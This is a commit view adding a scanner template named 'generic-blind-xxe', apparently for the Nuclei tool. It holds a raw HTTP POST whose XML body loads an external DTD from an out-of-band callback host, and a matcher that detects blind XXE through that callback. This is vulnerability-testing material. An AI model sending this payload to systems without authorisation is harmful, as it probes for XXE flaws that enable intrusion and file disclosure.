Create generic-blind-xxe.yaml

patch-1
Prince Chaddha 2021-08-17 17:18:52 +05:30 committed by GitHub
parent 59b2aeda40
commit c39f0e2077
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
tags: xxe,generic
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Referer: {{BaseURL}}
Content-Type: text/xml
Content-Length: 112
Connection: close
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
<foo>&e1;</foo>
redirects: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"